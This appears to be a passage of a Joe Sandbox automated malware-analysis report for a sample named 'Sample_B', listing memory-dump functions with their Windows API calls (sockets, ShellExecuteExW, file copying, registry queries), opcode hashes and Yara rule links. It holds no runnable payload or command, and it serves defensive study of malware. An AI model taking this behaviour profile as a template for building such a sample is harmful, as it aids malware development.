                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 7ba78153e1ab3e50f5f7df0852af5c62a0339fb90fb12eaae2032a0ad497d8b0
                                                                                  • Instruction ID: 5bbce32e6282d66aca8880e2d5969cd366889743f1c19fed39452b75e620c399
                                                                                  • Opcode Fuzzy Hash: 7ba78153e1ab3e50f5f7df0852af5c62a0339fb90fb12eaae2032a0ad497d8b0
                                                                                  • Instruction Fuzzy Hash: 97216F71500740AFFB20DF65DC85FA6FBA8EF04310F14846BED498B381D675A904CA65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0526, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 12226b9a0bab761fd6865c06df865b2b264a2b9f80beaa8ae732a8dcdc81f59a
                                                                                  • Instruction ID: 1106e8177a5e4dee8330bbd76346cc386438fc18a86cce50c635a71bc1be34c3
                                                                                  • Opcode Fuzzy Hash: 12226b9a0bab761fd6865c06df865b2b264a2b9f80beaa8ae732a8dcdc81f59a
                                                                                  • Instruction Fuzzy Hash: 5B219D72500304EFFB31DF55DC45F96FBE8EF08320F04855AE9899B681D671A905CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0027B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: 95f06e8b8575317c2afbd1cd227ecac06cc0a9b9a278fafbc6015a6de1d4cc69
                                                                                  • Instruction ID: a2cefd65645615793290228925edc57b4a005d7e115ff682d69f69f6a40a09c7
                                                                                  • Opcode Fuzzy Hash: 95f06e8b8575317c2afbd1cd227ecac06cc0a9b9a278fafbc6015a6de1d4cc69
                                                                                  • Instruction Fuzzy Hash: 2221C071504704EFFB21DF51DC45BA6FBE8EF08320F14846EEA898B252D371A914DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D1989, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 005D1A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: 6e6338cef04cd62e9f15ff028a8f4a64f51c3d2500fad66646267bbd151630e9
                                                                                  • Instruction ID: 915eb92cf127f3238fc67a1d201c251fed5f364a70541531a491a9df7463a318
                                                                                  • Opcode Fuzzy Hash: 6e6338cef04cd62e9f15ff028a8f4a64f51c3d2500fad66646267bbd151630e9
                                                                                  • Instruction Fuzzy Hash: 4D2190B1509780AFE722CB15DC45B62BFE8FF16310F08809BED848B253D265A908DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D018A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D01FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 7bd0064a37d6c21ce007f9ffb599688e2c9a8eefda9b11b7bff944ed62edb9aa
                                                                                  • Instruction ID: 5f289382b46d8e3acc99b0a36a8eec2a6ef837f461d82046f547c58a153e0528
                                                                                  • Opcode Fuzzy Hash: 7bd0064a37d6c21ce007f9ffb599688e2c9a8eefda9b11b7bff944ed62edb9aa
                                                                                  • Instruction Fuzzy Hash: 1F11AC76500700EFEB31CE55DC84FA7BBE8FF04720F04855BE9469A281D670E948CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0B72, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: f65b465012d19383efe52af4fca8bcdb9ca2595ed8f31a918eec443b926411a5
                                                                                  • Instruction ID: 9fc14437821b71370bb1a23942f598578833da8cb1dfab84c7bd0d5cf562dc6c
                                                                                  • Opcode Fuzzy Hash: f65b465012d19383efe52af4fca8bcdb9ca2595ed8f31a918eec443b926411a5
                                                                                  • Instruction Fuzzy Hash: A411B272500704EFFB21CF55DC85FAAFBA8EF04720F14856BF9098B291D671A9449BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D1162, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D11C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: d805bf52d4beedd13bc51a5ef7809e3a211b4dd132867f95498d2c8b8906e389
                                                                                  • Instruction ID: 0fd71ffc39fdddb483d7b24dae2a294ab418dbe786e676919c82f44fe51abff8
                                                                                  • Opcode Fuzzy Hash: d805bf52d4beedd13bc51a5ef7809e3a211b4dd132867f95498d2c8b8906e389
                                                                                  • Instruction Fuzzy Hash: AE119076400704EFEB21DF95CC85F96FBECEF04321F14856BEA09DA241D674A9448AB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0E9E, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction ID: 6526d2caa3f5a7d115f531a403ded9b061ada42801abf893d87708cb086c7621
                                                                                  • Opcode Fuzzy Hash: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction Fuzzy Hash: DB116D72500304EFEB20CF55DC85FA6BBA8EF04760F1489ABE9099B281D674A9448A75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0027A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 95cf4fadef43583aaa57caf10a2ec54f4258aec7f8676f2e80b3d15bfed69a3e
                                                                                  • Instruction ID: d93ec3f9217dab2c8246e8e4253c04062f2698f96e924df1674226b3c60dbdda
                                                                                  • Opcode Fuzzy Hash: 95cf4fadef43583aaa57caf10a2ec54f4258aec7f8676f2e80b3d15bfed69a3e
                                                                                  • Instruction Fuzzy Hash: D9118472409380AFDB22CF51DC44B62FFF4EF5A320F0885DAED898B552C275A518DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2DBC, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 005D2E18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  • Opcode ID: e480ea5a6b678adab3787eadd4b2a3121ff8530f6716c3003b3f0f5a3fba6c84
                                                                                  • Instruction ID: eeb8a548b49257619526419fb41345d6ec7bc84e93a48ad5a48240bd99f96f84
                                                                                  • Opcode Fuzzy Hash: e480ea5a6b678adab3787eadd4b2a3121ff8530f6716c3003b3f0f5a3fba6c84
                                                                                  • Instruction Fuzzy Hash: 6711B6715093809FD712CF25DC44B52BFA8EF16220F0880EBED49CF252D275E908CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BED2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 4e4a2030aae92839bbf5e3b0fb3b2effa52b1052d04004f5ef1a5f13295a31e7
                                                                                  • Instruction ID: 6a310bd180988371a3c6aeb9c97234c7db3fab6c9295f8e09822023fe34a7f88
                                                                                  • Opcode Fuzzy Hash: 4e4a2030aae92839bbf5e3b0fb3b2effa52b1052d04004f5ef1a5f13295a31e7
                                                                                  • Instruction Fuzzy Hash: 6D11C172400300EFEB21DF51DC45FA6FBA8EF04720F1485AAFD099A641C771A9148BB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A65A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: da9860313241ef942ed2848d7b9114f3dc9a35664271eb17ff53440b0a9f9ffe
                                                                                  • Instruction ID: acdfbbd46e4a4f4fc0d34c239697a0425c21e9778114ce2689464908de481f17
                                                                                  • Opcode Fuzzy Hash: da9860313241ef942ed2848d7b9114f3dc9a35664271eb17ff53440b0a9f9ffe
                                                                                  • Instruction Fuzzy Hash: 38116A714093C49FEB128B25DC54BA2BFB4EF47620F0980DBED889B263D2655908DB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D00C6, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 005D0142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleCtrlHandler
                                                                                  • String ID:
                                                                                  • API String ID: 1513847179-0
                                                                                  • Opcode ID: 99c7c666df4cc3807ce4f019c0f8848cf228b0fe84efe99ec8f0d6b8263af7ae
                                                                                  • Instruction ID: 6a0024a5c5d3924413da74d29e88a2cca8efc85f78f8a579df3bfebc3571a3de
                                                                                  • Opcode Fuzzy Hash: 99c7c666df4cc3807ce4f019c0f8848cf228b0fe84efe99ec8f0d6b8263af7ae
                                                                                  • Instruction Fuzzy Hash: 5F11C471909380AFD311CB25CC45F26FFB4EF86720F19819FEC489B692D225B915CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0F82, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: ee97b107b39dbdd254332ce41a1c568f3ddba524a4e36e97469b5450e98ba215
                                                                                  • Instruction ID: 5f5e23d5571cc747ac29356c2f041e4b54cb7e42ccf041c8d873a26fda09b0eb
                                                                                  • Opcode Fuzzy Hash: ee97b107b39dbdd254332ce41a1c568f3ddba524a4e36e97469b5450e98ba215
                                                                                  • Instruction Fuzzy Hash: 3711E072500340EFFB21DF14CC85FA6FBA8EF04720F14846BEA089B281C674A9448BB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D3065, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3375834691-0
                                                                                  • Opcode ID: 66fac4da3f6fffc46d99857c57c62fcf4a78afb8f72f7a10101a96967dbc844b
                                                                                  • Instruction ID: 7ee1f4ca86f916b487e106b2c4068957e6cc6fe89717afe74aa74ef3b7d28a7e
                                                                                  • Opcode Fuzzy Hash: 66fac4da3f6fffc46d99857c57c62fcf4a78afb8f72f7a10101a96967dbc844b
                                                                                  • Instruction Fuzzy Hash: 8211277650D7C09FD7128B25DC85B52BFB4EF13220F0880DBED858F263D265A908DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D18EC, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 17d01598eceaa200e604bcc4331b4ed18cf66dacd02a98c2fdf197947a17ccb0
                                                                                  • Instruction ID: 5341f0e04a921e2c1ac5dc7005301a5ecd3df3e5d319998289f622b81a2de9a2
                                                                                  • Opcode Fuzzy Hash: 17d01598eceaa200e604bcc4331b4ed18cf66dacd02a98c2fdf197947a17ccb0
                                                                                  • Instruction Fuzzy Hash: E61198715097809FD722CB15DC95B52BFA4EF02220F0884DBED858F253D2759904C762
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D31E7, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: e0151772889d0a1fafa25ff1e1bbf36c6451ec2e04941f71fd3ce40e3f5b08c3
                                                                                  • Instruction ID: 022e47c6f79e12b5489cb64be7a9098fa05c70cb0728c803fa59e988209984dc
                                                                                  • Opcode Fuzzy Hash: e0151772889d0a1fafa25ff1e1bbf36c6451ec2e04941f71fd3ce40e3f5b08c3
                                                                                  • Instruction Fuzzy Hash: 7311BE76509380AFDB228B15DC45B52BFB4EF16320F08809EED854B663C265A918DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A2D6, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A32C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: 1f4fcdf0653904be44c5cba11a39eb6978fc0afb449686de9e1d3cfb895f66ce
                                                                                  • Instruction ID: 575242d60534087a1e3b204ffd86b282a874371253f96ca0fe734885b5d0b39d
                                                                                  • Opcode Fuzzy Hash: 1f4fcdf0653904be44c5cba11a39eb6978fc0afb449686de9e1d3cfb895f66ce
                                                                                  • Instruction Fuzzy Hash: EC11E9715093809FDB12CF15DC85B96FFA4EF42320F08C0EBED898B652D275A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D13C0, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: c3d8c679a6198861511cb88ec1182be0222a7323bf91924fc3ef55adefd08207
                                                                                  • Instruction ID: 5a89e7b7259b0eeb679ce17ad1541dbf34cd9498413300e070565b5d9552c3d8
                                                                                  • Opcode Fuzzy Hash: c3d8c679a6198861511cb88ec1182be0222a7323bf91924fc3ef55adefd08207
                                                                                  • Instruction Fuzzy Hash: 62119071404780AFDB21CF55DC44B92FFF4EF06320F0984ABE9898B662C375A418DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2C6E, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 005D2CB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 739e30b0268f3409bcbbfe867d521d8fdc755f741f8c35b29763400b248190c1
                                                                                  • Instruction ID: 63bfe05ca99bd040e98f0905d64aabb382af0222f23764a6cc1b9a597fec57b0
                                                                                  • Opcode Fuzzy Hash: 739e30b0268f3409bcbbfe867d521d8fdc755f741f8c35b29763400b248190c1
                                                                                  • Instruction Fuzzy Hash: 7A1130716142409BEB20CF19DC85756FFD8EB24761F08846BED09CB751D671DD04DA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2BA0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 41883ef3f56f4dd2a121763323eba1bfd216204aa2115dea5d3526f33f84e54e
                                                                                  • Instruction ID: 8ec00b62c7bf2c968fd4895a1bada72e026bef48d1c6cbc436771644a96fe146
                                                                                  • Opcode Fuzzy Hash: 41883ef3f56f4dd2a121763323eba1bfd216204aa2115dea5d3526f33f84e54e
                                                                                  • Instruction Fuzzy Hash: 1B11A3725083849FE721CF15DC85A92FFE4EF16320F0980DFED858B262C275A808DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 8b18a1b50910cf150b4bca2354069e9755a348e171c7d9ba7f465acd8a80bcf0
                                                                                  • Instruction ID: b7be90f451e267cb413f0ce934df03aec3c6617244728b8b91646feb83231c8e
                                                                                  • Opcode Fuzzy Hash: 8b18a1b50910cf150b4bca2354069e9755a348e171c7d9ba7f465acd8a80bcf0
                                                                                  • Instruction Fuzzy Hash: 6701DE76510300EFFB21CF11DC85BA6FB98EF04721F14C09AFE099B281D6B4A9048AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2763, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: cdb967a3caa246dc3852ce1b7378c8b57100385fcb9e6f53ac3dd9bd74a5d0c1
                                                                                  • Instruction ID: 594e6870aadeebdef725bb54e2e79e82593106a5de7cdabf1ee08b0cf6aab0e3
                                                                                  • Opcode Fuzzy Hash: cdb967a3caa246dc3852ce1b7378c8b57100385fcb9e6f53ac3dd9bd74a5d0c1
                                                                                  • Instruction Fuzzy Hash: AA118F315093809FDB228F15CC44A52FFB4EF16220F0985DBE9854B263C275A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D20E6, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 005D2131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: 1e6da5edafdf39e845603a9c478794309fa0f5cbea3302af3e87edfafb35e7cd
                                                                                  • Instruction ID: 699cf61e1fe70b149f6888ccf210e686a5dca8aa6c7a248f988414d1f5b68f9c
                                                                                  • Opcode Fuzzy Hash: 1e6da5edafdf39e845603a9c478794309fa0f5cbea3302af3e87edfafb35e7cd
                                                                                  • Instruction Fuzzy Hash: F2112A75900200DFEB20CF59D885B66FBE8FB24761F08C4ABED498B352D671E904DA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D133A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 005D138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: a0a9c9cdd4a2ea4cb44492edc8fc9539345656aacd14f9ef579aefe80d1046b3
                                                                                  • Instruction ID: fdff6b9847c690cd704c98d59501f9d57bd210e6cf3ae31a82a7aef24c6efa6d
                                                                                  • Opcode Fuzzy Hash: a0a9c9cdd4a2ea4cb44492edc8fc9539345656aacd14f9ef579aefe80d1046b3
                                                                                  • Instruction Fuzzy Hash: 2E017171900600ABE310DF16DC46B66FBA8FB84A20F14816AED099B741D235B515CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2DDE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 005D2E18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
